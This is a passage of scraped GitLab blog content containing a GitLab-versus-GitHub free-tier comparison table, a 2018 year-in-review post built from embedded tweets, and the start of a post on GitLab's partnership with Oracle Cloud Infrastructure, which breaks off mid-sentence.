contributors](http://contributors.gitlab.com/) to make this a reality.\n\nIn the meantime, here are some more details of our current GitLab free private repository offering vs GitHub's:\n\n| Free functionality                  | GitLab    | GitHub                                    |\n|--------------------------|-----------|-------------------------------------------|\n| Private repositories     | Yes       | Yes                                       |\n| Number of collaborators  | Unlimited | 3                                         |\n| Wiki                     | Yes       | No (public or paid only)                  |\n| Pages                    | Yes       | No (public or paid only)                  |\n| Capacity                 | 10GB      | 1GB                                       |\n| [Indicates who is paying](https://twitter.com/rgaiacs/status/1082581763745083392)  | No        | Yes                                 |\n| Free CI                 | 2,000 min.     | Maybe a free tier for Actions on Azure                              |\n| [Entire DevOps lifecycle](https://about.gitlab.com/stages-devops-lifecycle/) | Yes | No |\n| Location of the repo | Anywhere | Not in groups/orgs |\n| API concurrent rate limit | 36000 | 5000 |\n\nSign up for a [free trial](https://about.gitlab.com/pricing/#gitlab-com)\n",[930,9],{"slug":2193,"featured":6,"template":689},"github-offering-free-private-repos-for-up-to-three-collaborators","content:en-us:blog:github-offering-free-private-repos-for-up-to-three-collaborators.yml","Github Offering Free Private Repos For Up To Three Collaborators","en-us/blog/github-offering-free-private-repos-for-up-to-three-collaborators.yml","en-us/blog/github-offering-free-private-repos-for-up-to-three-collaborators",{"_path":2199,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2200,"content":2206,"config":2212,"_id":2214,"_type":14,"title":2215,"_source":16,"_file":2216,"_stem":2217,"_extension":19},"/en-us/blog/gitlab-2018-year-in-review",{"title":2201,"description":2202,"ogTitle":2201,"ogDescription":2202,"noIndex":6,"ogImage":2203,"ogUrl":2204,"ogSiteName":673,"ogType":674,"canonicalUrls":2204,"schema":2205},"2018: GitLab's year in review","Take a look at the highlight reel from 2018 – from landing $100M in funding to welcoming a host of great open source projects to GitLab.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670162/Blog/Hero%20Images/happy-holidays-cover.png","https://about.gitlab.com/blog/gitlab-2018-year-in-review","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"2018: GitLab's year in review\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Emily von Hoffmann\"},{\"@type\":\"Person\",\"name\":\"Rebecca Dodd\"}],\n        \"datePublished\": \"2019-01-10\",\n      }",{"title":2201,"description":2202,"authors":2207,"heroImage":2203,"date":2209,"body":2210,"category":299,"tags":2211},[2208,1859],"Emily von Hoffmann","2019-01-10","\n\nIn 2018, we added 289 new team members, raised another round of funding, spread the word about remote work, surpassed 2,000 contributors, welcomed some awesome open source projects to GitLab, and shipped 12 releases. It's been a banner year for GitLab, so before diving into 2019, we invite you to peer back through the mists of time at the top events from the past year, according to our community:\n\n- [Product news](#product-news)\n- [Community news](#community-news)\n- [Company news](#gitlab-news)\n\n## Product news\n\n### We announced GitLab Serverless\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Announcing GitLab Serverless 🚀\u003Ca href=\"https://t.co/Iu4GwHsaYK\">https://t.co/Iu4GwHsaYK\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1072521159638482945?ref_src=twsrc%5Etfw\">December 11, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We introduced Meltano\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Hey, data teams! We&#39;re working on a tool just for you. Read all about Meltano, from \u003Ca href=\"https://twitter.com/jakecodes?ref_src=twsrc%5Etfw\">@jakecodes\u003C/a> &amp; @tayloramurphy1 ✌️  \u003Ca href=\"https://t.co/egEzILPNzu\">https://t.co/egEzILPNzu\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1024773311367131137?ref_src=twsrc%5Etfw\">August 1, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### You got _really_ excited about the Web IDE\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">👋 Meet the GitLab Web IDE!\u003Ca href=\"https://t.co/vhx2RR1uU6\">https://t.co/vhx2RR1uU6\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1007679206187249664?ref_src=twsrc%5Etfw\">June 15, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We successfully migrated to GCP and have noticed some improvements\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">What&#39;s up with \u003Ca href=\"https://t.co/W0iwxWzEZ8\">https://t.co/W0iwxWzEZ8\u003C/a>? I wrote an analysis of \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@GitLab\u003C/a>&#39;s stability and performance since we migrated to \u003Ca href=\"https://twitter.com/googlecloud?ref_src=twsrc%5Etfw\">@googlecloud\u003C/a> in August.\u003Ca href=\"https://t.co/8JvvbVq9wJ\">https://t.co/8JvvbVq9wJ\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/GoogleCloud?src=hash&amp;ref_src=twsrc%5Etfw\">#GoogleCloud\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/Cloud?src=hash&amp;ref_src=twsrc%5Etfw\">#Cloud\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/DevOps?src=hash&amp;ref_src=twsrc%5Etfw\">#DevOps\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/SaaS?src=hash&amp;ref_src=twsrc%5Etfw\">#SaaS\u003C/a> \u003Ca href=\"https://twitter.com/hashtag/performance?src=hash&amp;ref_src=twsrc%5Etfw\">#performance\u003C/a> \u003Ca href=\"https://t.co/L6TWhh2Z0B\">pic.twitter.com/L6TWhh2Z0B\u003C/a>\u003C/p>&mdash; Andrew Newdigate (@suprememoocow) \u003Ca href=\"https://twitter.com/suprememoocow/status/1050467664584462337?ref_src=twsrc%5Etfw\">October 11, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\nAND you can check out [all our releases from 2018 (and from all time) over here](/releases/categories/releases/).\n\n## Community news\n\n### GNOME moves to GitLab\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Anyway, I&#39;m proud of \u003Ca href=\"https://twitter.com/gnome?ref_src=twsrc%5Etfw\">@gnome\u003C/a> because we achieved it, we made a huge effort on adapting and will continue doing it because that&#39;s who we are. And with this, I want to announce that the mass migration to \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> is now completed! Welcome all to 2018! 🎉\u003C/p>&mdash; Carlos Soriano (@csoriano1618) \u003Ca href=\"https://twitter.com/csoriano1618/status/1001501640623640577?ref_src=twsrc%5Etfw\">May 29, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### Drupal moves to GitLab\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Welcome to the party \u003Ca href=\"https://twitter.com/drupal?ref_src=twsrc%5Etfw\">@drupal\u003C/a>! 🎉 \u003Ca href=\"https://t.co/umLw6YlSTl\">https://t.co/umLw6YlSTl\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1030164542360375296?ref_src=twsrc%5Etfw\">August 16, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### Freedesktop.org moves to GitLab\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">We get pretty excited when open source projects tell us they’re \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a>. Welcome, \u003Ca href=\"https://twitter.com/hashtag/freedesktop?src=hash&amp;ref_src=twsrc%5Etfw\">#freedesktop\u003C/a>! \u003Ca href=\"https://t.co/oLIfXZb7Va\">https://t.co/oLIfXZb7Va\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1031864994747609088?ref_src=twsrc%5Etfw\">August 21, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### Errrrrybody is #movingtogitlab\n\nWell, not _quite_, but 10x the normal daily number is still a big deal 😎\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">We&#39;re seeing 10x the normal daily amount of repositories \u003Ca href=\"https://twitter.com/hashtag/movingtogitlab?src=hash&amp;ref_src=twsrc%5Etfw\">#movingtogitlab\u003C/a> \u003Ca href=\"https://t.co/7AWH7BmMvM\">https://t.co/7AWH7BmMvM\u003C/a> We&#39;re scaling our fleet to try to stay up. Follow the progress on \u003Ca href=\"https://t.co/hN0ce379SC\">https://t.co/hN0ce379SC\u003C/a> and \u003Ca href=\"https://twitter.com/movingtogitlab?ref_src=twsrc%5Etfw\">@movingtogitlab\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1003409836170547200?ref_src=twsrc%5Etfw\">June 3, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### Y'all had _feelings_ about burnout\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">‣ Don&#39;t go straight to work after you wake up.\u003Cbr>‣ Put \u003Ca href=\"https://twitter.com/hashtag/Slack?src=hash&amp;ref_src=twsrc%5Etfw\">#Slack\u003C/a> notifications on dnd on weekends. \u003Cbr>‣ When you notice someone in a different time zone should be asleep, tell them.\u003Ca href=\"https://t.co/zKiytIMXsJ\">https://t.co/zKiytIMXsJ\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/975463098676076544?ref_src=twsrc%5Etfw\">March 18, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### And everyone struggles with Git sometimes\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Git happens! Here&#39;s how to fix it 💅\u003Ca href=\"https://t.co/IMAuDH8j3P\">https://t.co/IMAuDH8j3P\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1058445892464902146?ref_src=twsrc%5Etfw\">November 2, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">How &amp; why to keep your Git commit history clean 💻✨ via \u003Ca href=\"https://twitter.com/Kushal_Pandya?ref_src=twsrc%5Etfw\">@Kushal_Pandya\u003C/a> \u003Ca href=\"https://t.co/HbYv2KsyGQ\">https://t.co/HbYv2KsyGQ\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1006245935675006977?ref_src=twsrc%5Etfw\">June 11, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We celebrated 20 years of open source ❤️\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">We&#39;re excited to celebrate the 20th anniversary of open source this year at \u003Ca href=\"https://twitter.com/hashtag/OSCON?src=hash&amp;ref_src=twsrc%5Etfw\">#OSCON\u003C/a>! Check out our brief history of OSS ✨ \u003Ca href=\"https://t.co/ox2s1rDS9f\">https://t.co/ox2s1rDS9f\u003C/a> \u003Ca href=\"https://t.co/LIdQtQWeoO\">pic.twitter.com/LIdQtQWeoO\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1018886162851811328?ref_src=twsrc%5Etfw\">July 16, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### And made GitLab Gold free for open source projects and educational institutions 🎉\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Today, we&#39;re excited to announce that GitLab Ultimate and Gold are now free for educational institutions and open source projects 💜\u003Ca href=\"https://t.co/5PA08IYnwM\">https://t.co/5PA08IYnwM\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1004033746897719298?ref_src=twsrc%5Etfw\">June 5, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We celebrated inspiring GitLab users\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Video and blog about my journey from stunting motorcycles to \u003Ca href=\"https://twitter.com/hashtag/Kubernetes?src=hash&amp;ref_src=twsrc%5Etfw\">#Kubernetes\u003C/a> - and some gushing about my love for \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> \u003Ca href=\"https://t.co/ro73lucF7n\">https://t.co/ro73lucF7n\u003C/a>\u003C/p>&mdash; Leah Petersen (@eccomi_leah) \u003Ca href=\"https://twitter.com/eccomi_leah/status/1009894688906792960?ref_src=twsrc%5Etfw\">June 21, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### And there was lots of love for GitLab swag\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003C!-- first tweet -->\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Thanks for the swag \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a>. That&#39;s one reason to contribute 😃 \u003Ca href=\"https://t.co/58Z1PsGTen\">pic.twitter.com/58Z1PsGTen\u003C/a>\u003C/p>&mdash; Amit Rathi (@amittrathi) \u003Ca href=\"https://twitter.com/amittrathi/status/1074562107545272320?ref_src=twsrc%5Etfw\">December 17, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C!-- second tweet -->\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">It’s the first time that I receive a birthday gift from the company that I work for. It’s simple, small and modest... but it goes a long way. Thanks \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> I love them 😍👍🎉 \u003Ca href=\"https://t.co/AMCUdQevFu\">pic.twitter.com/AMCUdQevFu\u003C/a>\u003C/p>&mdash; Matej Latin (@matejlatin) \u003Ca href=\"https://twitter.com/matejlatin/status/1039473209291231232?ref_src=twsrc%5Etfw\">September 11, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">When it comes to swag, \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> has raised the bar. This is an actual wooden pin. More pins as swag please 😬 cheers \u003Ca href=\"https://twitter.com/samdbeckham?ref_src=twsrc%5Etfw\">@samdbeckham\u003C/a> \u003Ca href=\"https://t.co/bcZtvqAjPE\">pic.twitter.com/bcZtvqAjPE\u003C/a>\u003C/p>&mdash; Sophie Koonin (@type__error) \u003Ca href=\"https://twitter.com/type__error/status/1058105160176726017?ref_src=twsrc%5Etfw\">November 1, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Thank you to \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> for the swag! Dear participants, we have many things for you 😁 \u003Ca href=\"https://t.co/9BINX4UbLD\">pic.twitter.com/9BINX4UbLD\u003C/a>\u003C/p>&mdash; TechForum eXplore (@TeXWL) \u003Ca href=\"https://twitter.com/TeXWL/status/1011652998953611268?ref_src=twsrc%5Etfw\">June 26, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">First package of swag for our CI/CD \u003Ca href=\"https://twitter.com/hashtag/Hackathon?src=hash&amp;ref_src=twsrc%5Etfw\">#Hackathon\u003C/a> arrived - yes: there will be \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> socks! 49 people RSVPed so far - it‘s gonna be epic! via \u003Ca href=\"https://twitter.com/MeetupDE?ref_src=twsrc%5Etfw\">@MeetupDE\u003C/a> \u003Ca href=\"https://t.co/fZtBd7VZRi\">https://t.co/fZtBd7VZRi\u003C/a> \u003Ca href=\"https://t.co/qyLbTeZN2t\">pic.twitter.com/qyLbTeZN2t\u003C/a>\u003C/p>&mdash; Michael Lihs (@kaktusmimi) \u003Ca href=\"https://twitter.com/kaktusmimi/status/970199201320665088?ref_src=twsrc%5Etfw\">March 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n## GitLab news\n\n### We announced Series D funding and joined the 🦄 club\n\nIn September we [announced $100 million in Series D funding](/blog/announcing-100m-series-d-funding/), led by ICONIQ Capital. This brought our valuation to over $1 billion, and we couldn't be more excited to use this momentum to become best-in-class in every DevOps software category, from planning to monitoring.\n\n### We made #44 on the Inc. 5000 list\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">ICYMI: We made number 44 on the \u003Ca href=\"https://twitter.com/hashtag/inc5000?src=hash&amp;ref_src=twsrc%5Etfw\">#inc5000\u003C/a> list of 2018&#39;s fastest-growing companies 🎉: \u003Ca href=\"https://t.co/x3jBqItfVK\">https://t.co/x3jBqItfVK\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1032201460946268160?ref_src=twsrc%5Etfw\">August 22, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We hung out IRL in beautiful Cape Town\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Good morning from Cape Town! It&#39;s Day 6 of the GitLab Summit 😍 \u003Ca href=\"https://t.co/WHvaSnKHM4\">pic.twitter.com/WHvaSnKHM4\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1034402765974450176?ref_src=twsrc%5Etfw\">August 28, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### We made #17 on YC's 2018 Top Companies list\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Feeling proud of everyone \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@GitLab\u003C/a>: as of October 2018, we are number 17 of the \u003Ca href=\"https://twitter.com/ycombinator?ref_src=twsrc%5Etfw\">@YCombinator\u003C/a> Top Companies List, among companies like Airbnb, Stripe, Dropbox, Reddit and Twitch \u003Ca href=\"https://t.co/UQZCaBAUeJ\">https://t.co/UQZCaBAUeJ\u003C/a> \u003Ca href=\"https://t.co/YUJbDhRSyq\">pic.twitter.com/YUJbDhRSyq\u003C/a>\u003C/p>&mdash; Pedro MS (@PedroMScom) \u003Ca href=\"https://twitter.com/PedroMScom/status/1068146315404763139?ref_src=twsrc%5Etfw\">November 29, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n### And we debuted some 🔥 integrations\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">Apple just announced Xcode 10 is now integrated with GitLab \u003Ca href=\"https://t.co/eQbtiY4IYm\">pic.twitter.com/eQbtiY4IYm\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/1003764673454342144?ref_src=twsrc%5Etfw\">June 4, 2018\u003C/a>\u003C/blockquote>\n\u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n  \u003Cblockquote class=\"twitter-tweet\" data-lang=\"en\">\u003Cp lang=\"en\" dir=\"ltr\">We’re so excited to announce the new GKE integration for GitLab! Now you’re just moments away from a scalable development environment. \u003Ca href=\"https://t.co/4RRVOXlrwz\">https://t.co/4RRVOXlrwz\u003C/a> \u003Ca href=\"https://t.co/RSWwZDSPup\">pic.twitter.com/RSWwZDSPup\u003C/a>\u003C/p>&mdash; GitLab (@gitlab) \u003Ca href=\"https://twitter.com/gitlab/status/981916957527044096?ref_src=twsrc%5Etfw\">April 5, 2018\u003C/a>\u003C/blockquote>\n  \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n\nThat's all for now! We can't wait to see what 2019 will bring 🌟 As always, come hang out and tweet us your thoughts [@gitlab](https://twitter.com/gitlab).\n",[267,803,930,9],{"slug":2213,"featured":6,"template":689},"gitlab-2018-year-in-review","content:en-us:blog:gitlab-2018-year-in-review.yml","Gitlab 2018 Year In Review","en-us/blog/gitlab-2018-year-in-review.yml","en-us/blog/gitlab-2018-year-in-review",{"_path":2219,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2220,"content":2226,"config":2234,"_id":2236,"_type":14,"title":2237,"_source":16,"_file":2238,"_stem":2239,"_extension":19},"/en-us/blog/gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development",{"title":2221,"description":2222,"ogTitle":2221,"ogDescription":2222,"noIndex":6,"ogImage":2223,"ogUrl":2224,"ogSiteName":673,"ogType":674,"canonicalUrls":2224,"schema":2225},"Oracle and GitLab partner for cloud-native app development","Learn the benefits of deploying the DevOps platform on Oracle Cloud Infrastructure.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668514/Blog/Hero%20Images/multi-cloud-future.jpg","https://about.gitlab.com/blog/gitlab-and-oracle-partner-for-a-cloud-native-approach-to-modern-application-development","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitLab and Oracle partner for a cloud native approach to modern application development\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Creighton Swank\"},{\"@type\":\"Person\",\"name\":\"Vick Kelkar\"}],\n        \"datePublished\": \"2022-10-20\",\n      }",{"title":2227,"description":2222,"authors":2228,"heroImage":2223,"date":2231,"body":2232,"category":1119,"tags":2233},"GitLab and Oracle partner for a cloud native approach to modern application development",[2229,2230],"Creighton Swank","Vick Kelkar","2022-10-20","\nModern application development requires a cloud native platform that can operate in and across multiple cloud providers. GitLab has partnered with Oracle to enable customers to run GitLab’s DevOps platform on Oracle Cloud Infrastructure (OCI).\n\nWith OCI, organizations can accelerate migrations of existing enterprise workloads, deliver better reliability and performance for all applications, and offer the complete services customers need to build innovative cloud applications. With GitLab’s DevOps platform and OCI, businesses can create a resilient, high-performance DevOps environment. OCI also supports automatic operating system patching and zero trust architecture, which aligns with GitLab’s focus on [application security](/stages-devops-lifecycle/secure/).\n\n## The benefits of pairing GitLab and OCI\n\nPairing GitLab’s DevOps platform and OCI provides many benefits, including the following:\n\n- performance\n- platform breadth\n- security\n- value\n- hybrid and multi-cloud environments\n- GovCloud regions\n\n### Performance\n\nOCI provides a high-performance, resilient foundation for cloud services. Customers can quickly provision instances that feature the latest-generation processors via API, SDK, command line, Terraform, or the console. Workloads can scale up and/or out based on their requirements and compute-intensive workloads can leverage GPU shapes for hardware acceleration of AI/ML workloads. At the same time, GitLab runners can be configured to [leverage Nvidia GPUs](https://docs.gitlab.com/runner/configuration/gpus.html) for various executors to take advantage of GPUs and AI/ML workloads. \n\n### Platform breadth\n\nGitLab’s DevOps platform has the ability to integrate with Kubernetes service like OKE via GitLab Kubernetes agent. Leveraging GitLab’s Kubernetes agent will unlock [GitOps workflow](https://docs.gitlab.com/ee/user/clusters/agent/gitops.html) and [CI/CD workflow](https://docs.gitlab.com/ee/user/clusters/agent/ci_cd_workflow.html) for cloud native development. And the Oracle Cloud Infrastructure also offers a wide variety of platform services that allow customers to run workloads without having to manage infrastructure. Customers can run workloads on compute instances, in containers with Oracle Kubernetes Engine (OKE), or even as serverless functions. Services like object storage and events can be leveraged to build applications without managing infrastructure at all. For a complete list of these services, please click [here](https://docs.oracle.com/en-us/iaas/Content/services.htm). \n\n### Security\n\nThe second generation of OCI has been redesigned from the ground up to be a secure cloud. Oracle designed OCI architecture for security of the platform through isolated network virtualization, highly secure firmware installation, a controlled physical network, and network segmentation. GitLab’s DevOps platform is not only an ODIC provider but the platform integrates with other identity providers to support single sign-on capabilities. The platform’s [permission model](https://docs.gitlab.com/ee/user/permissions.html#instance-wide-user-permissions) follows similar approaches used by OCI around separation of concerns and role-based access to resources. \n\n### Value\n\nMission-critical and revenue-generating applications demand more than just availability from their cloud infrastructure. Mission-critical workloads also require consistent performance and the ability to manage, monitor, and modify resources running in the cloud at any time. OCI offers end-to-end SLAs covering performance, availability, and manageability of services. \n\nGitLab’s DevOps platform uses the same code base for the SaaS offering as well as self-managed instances. Having the same code base allows customers to adopt the mission-critical DevOps platform in heavily regulated industries such as financial services and healthcare.\n\n### Support for hybrid and multi-cloud environments\n\nEven though many enterprises are moving workloads to the cloud, the reality is this is a multi-cloud world, and many enterprises still maintain infrastructure locally. Oracle has entered into strategic partnerships designed to make it easier for customers to operate in a hybrid and multi-cloud environment. \n\nOracle has partnered with VMware to create the Oracle Cloud VMware solution that allows customers the ability to use their existing tools and processes to manage a VMware environment in OCI. This allows enterprises to accelerate cloud adoption without having to re-architect their applications.\n\nGitLab’s DevOps platform can be deployed on vSphere infrastructure using the GitLab [omnibus install](https://docs.gitlab.com/omnibus/) method. The platform can be installed on-premises or in the cloud. GitLab can be deployed on VMs and the GitLab runners can extend CI capabilities into other cloud environments and [cloud-native hybrid](https://docs.gitlab.com/ee/administration/reference_architectures/#cloud-native-hybrid) deployments.\n\n### GovCloud regions\n\nOCI can provide government customers with the stringent security 